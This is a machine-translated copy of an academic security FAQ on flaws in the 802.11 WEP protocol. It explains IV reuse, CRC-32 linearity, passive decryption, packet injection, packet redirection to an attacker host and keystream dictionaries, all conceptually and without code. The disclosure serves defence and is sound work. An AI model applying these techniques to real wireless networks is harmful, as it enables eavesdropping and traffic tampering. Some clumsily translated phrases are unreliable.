Security of the WEP algorithm

Translated from http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html

Security of the WEP algorithm

This article describes some of our analysis of the Wired Equivalent encryption protocol (WEP, part of the 802.11 standard), which is done jointly by Nikita Borisov, Ian Goldberg, and David Wagner 3 people. If you have any questions, please contact us via [email protected] .

Executive Summary

We have discovered a number of vulnerabilities in WEP that greatly weaken the security of the system. Specifically, we found the following types of attacks:

• Passive attacks that decrypt data traffic based on statistical analysis.
• Active attacks, based on known plaintext data, inject spoofed data traffic into the network via unauthorized mobile stations.
• Active attacks that decrypt data traffic by tricking the access point.
• Dictionary attack, after analyzing the data traffic for about one day, it can realize the real-time automatic decryption of all data traffic.

Our analysis shows that all of these attacks require only cheap, easy-to-use devices that can be easily implemented. We recommend that anyone using a 802.11 wireless network do not rely on WEP to provide security, but should use other security measures to protect their wireless networks.
Note that our attack methods apply to both 40-bit and 128-bit WEP. They also apply to wireless networks with a 802.11B standard (802.11b is an extension of 802.11, which can support higher data rates but still retain the use of the WEP protocol).

Introduction to WEP

The 802.11 standard has developed a communication specification for wireless LANs. Wired Equivalent Encryption Protocol (WEP) is used to prevent wireless communication from being tapped. Another function of WEP is to prevent unauthorized access to the wireless network; This feature is not a clear target for the 802.11 standard, but it is often considered a feature of WEP.

WEP relies on a key that is shared between a mobile station (for example, a notebook with a wireless card) and an access point (that is, a base station). The key is used to encrypt data before sending the data, and an integrity check is used to ensure that the packet has not been tampered with during transmission. The standard does not describe how the key was built. In practice, most facilities share a single key between all mobile stations and access points. More complex key management techniques can help prevent the attacks we describe; However, as far as we know, there is no commercial product to support this technology.

The following two sections describe the problems in the protocol and the technical details of the attack. This assumes that the reader has some background knowledge of the cryptographic protocols. You may wish to jump directly to the following sections, which discuss the feasibility of the attack.

Problem

WEP uses the RC4 encryption algorithm, which is a stream cipher. The principle of a stream cipher is to extend a short key into an infinite pseudo-random key stream. The sender obtains ciphertext by XOR operation of the key stream with the plaintext. The receiver has the same short key and uses it to get the same key stream. By XOR the key stream with ciphertext, the original plaintext can be obtained.

This mode of operation makes streaming passwords susceptible to several attacks. If an attacker flips one of the ciphertext, the corresponding bits in the plaintext will be flipped after decryption. In addition, if a eavesdroppers intercepts two ciphertext encrypted with the same key stream, he is also able to know the XOR result of two plaintext. Known XOR can restore plaintext through statistical analysis. Statistical analysis becomes more useful as more ciphertext encrypted with the same key stream is intercepted. Once one of the plaintext is known, it is easy to recover all the other.

WEP has a defensive strategy for these attacks. To ensure that the packet has not been modified during transmission, it uses a field of integrity Check (IC) in the packet. To avoid encrypting two plaintext with the same key stream, an initialization vector (IV) is used to generate a different RC4 key for each packet, along with the shared key. IV is also included in the packet. However, none of them are properly implemented, resulting in poor security.

The Integrity check field is implemented as a CRC-32 checksum, which is part of the payload of the packet. However, CRC-32 is linear, which means that the bit differences between their CRC-32 can be calculated based on the bit differences of the packets. In other words, flipping the nth bit in the message allows you to explicitly figure out the bits that must be flipped in their CRC-32 to produce the same alignment as the modified message. Because bit flipping is still in effect after RC4 decryption, this allows an attacker to arbitrarily flip bits in the encrypted message and properly adjust its calibration and to make the resulting message look legitimate.

The initialization vector in WEP is a 24-bit field that is sent as the plaintext portion of the message. The size of the initialization vector is so small that it inevitably causes the same key stream to be reused. For a busy access point, it constantly sends a 1500-byte packet at a speed of 11Mbps, which will be 1500 * 8/(11 * 10^6) * 2^24 = ~18000 seconds, or 5 hours to drain IV. (The time may be less because many packets are less than 1500 bytes.) This allows an attacker to collect ciphertext encrypted with the same key stream and then recover the plaintext through statistical analysis. To make things worse, the probability of an IV conflict will be higher when all mobile stations use the same key. For example, the Lucent wireless card resets the IV to 0 when the NIC is initialized, and increments the IV by 1 for each packet sent. This means that the two NICs inserted at roughly the same time will provide the attacker with a rich IV conflict opportunity. (worse, the 802.11 standard stipulates that changing the IV with each packet is optional!)

Attack method passive attack decrypt data traffic

The first attack method is directly derived from the above analysis results. A passive eavesdroppers can intercept all wireless traffic until an IV conflict occurs. An XOR result of two plaintext messages can be obtained by using two ciphertext encrypted with the key stream generated by the same IV. The resulting XOR result can be used to infer the plaintext content of two messages. IP traffic tends to be very predictable and includes a lot of redundant data. These redundant data can be used to eliminate many of the possibilities of message plaintext. Further credible speculation about the content of the message can be statistically reduced by the search scope of the possibility of the message plaintext, in some scenarios, even the exact contents of the clear text can be determined.

When statistical analysis based on only two packets is not yet able to determine the results, attackers can look for more IV collisions. It is entirely possible to recover a significant amount of data packets encrypted using the same key stream, and the success rate of statistical analysis will increase rapidly, taking some time. Once there is clear text in which one of the messages can be recovered, all other plaintext of the message using the same IV encryption can be restored because all paired XOR results are known.

An extension of this approach is to use a host somewhere on the internet to send data traffic from outside to a host inside the wireless network. The content of this traffic is known to the attacker, i.e. the plaintext is known. When an attacker intercepts an encrypted message sent by him on 802.11, he will be able to decrypt all messages encrypted using the same initialization vector.

Active attacks inject data traffic

The following attack methods are also directly derived from the above analysis results. Suppose an attacker knew the plaintext of an encrypted message. He can use this knowledge to forge legitimate cryptographic packets. The process involves constructing a new message, calculating its CRC-32, and making a bit flip over the original encrypted message, turning the plaintext message into a new message. The principle here is that RC4 (x) xor X xor Y = RC4 (y). This packet can now be sent to an access point or mobile station, which will be accepted as a valid packet.

This attack can become more insidious through small deformations. Even if you do not fully know the contents of the grouping, you can flip the selected bits in the message and correctly adjust their encrypted form of the CRC (as described in the previous section) to obtain a tamper-proof but still correct encrypted packet. If an attacker knows part of a packet, he can intercept it and perform a selective modification on it. For example, you can modify commands that are sent to the shell through a Telnet session or modify the interaction commands with the file server.

Active attacks originating from both ends at the same time

The above attack method can be further extended to decrypt arbitrary data traffic. Here, the attacker is not guessing the contents of the packet, but the packet header. Generally speaking, these content is easy to know or guess; In fact, we just need to guess the destination IP address. By doing this, an attacker could change the destination IP address by flipping some bits and sending it over a malicious mobile station to send the packet to a machine on his control somewhere on the internet. Most wireless facilities are connected to the Internet; The packet will be decrypted by the access point, and the decrypted packet will be forwarded to the attacker's machine via the appropriate gateway and router for clear text. If you can also guess the TCP header, you can even modify the destination port number of the packet to 80, which makes it possible to pass through most firewalls.

Dictionary attacks

The Narrow IV value space allows an attacker to build a decryption dictionary. Once he knows the plaintext of a packet, he can calculate the RC4 key stream for that IV. This key stream can be used to decrypt all other packets that use the same IV. Over time, using the techniques above, an attacker could build a iv-key stream dictionary. This table requires very little storage space (~15GB); Once the build succeeds, an attacker can decrypt any packet on the wireless link.

Listening

Although it is difficult to decode a 2.4GHz digital signal, the hardware that listens for 802.11 data transmission is ready for attackers, the average 802.11 consumer product. These products have all the necessary listening capabilities, and what the attackers need to do is make the most of it.

Although most 802.11 devices are designed to ignore encrypted content that they don't know, we can successfully intercept data traffic using WEP encryption by modifying the NIC-driven configuration. We can use promiscuous mode to let the NIC firmware return unknown ciphertext to us for further inspection and analysis.

Active attacks (which require data to be transmitted, not just listening to data) look more difficult, but not impossible. Most 802.11 products have programmable firmware that can be reverse engineered and modified to provide attackers with the ability to inject data traffic. Of course, such reverse engineering takes a long time (we haven't done it ourselves), but it's important to note that this is a one-off investment. A group of capable people can work together to distribute malicious firmware through underground circles, or sell it to groups interested in espionage activities. This is a high-margin business, so the time invested can be easily earned back.

Summarize

Wired Equivalent Encryption Protocol (WEP) is not secure. The problem with this protocol is that the designers mistakenly understand the cryptography primitives, resulting in a combination of using them in an insecure way. The attack technique here shows how important it is to invite professionals in the design of cryptographic protocols to make public peer review; Only after doing so can we really avoid the problems that are pointed out here.

Resources

• Slides from Nikita's talk at the Mac Crypto Workshop (January 30, 2001).
• A Paper presented at 7th Annual International Conference on Mobile Computing and Networking, describing the attacks.
• Bill Arbaugh has a Web page which summarizes many 802.11 security problems.
• Slides from Ian's talk at the Black Hat briefings (July, 2001).

Security of the WEP algorithm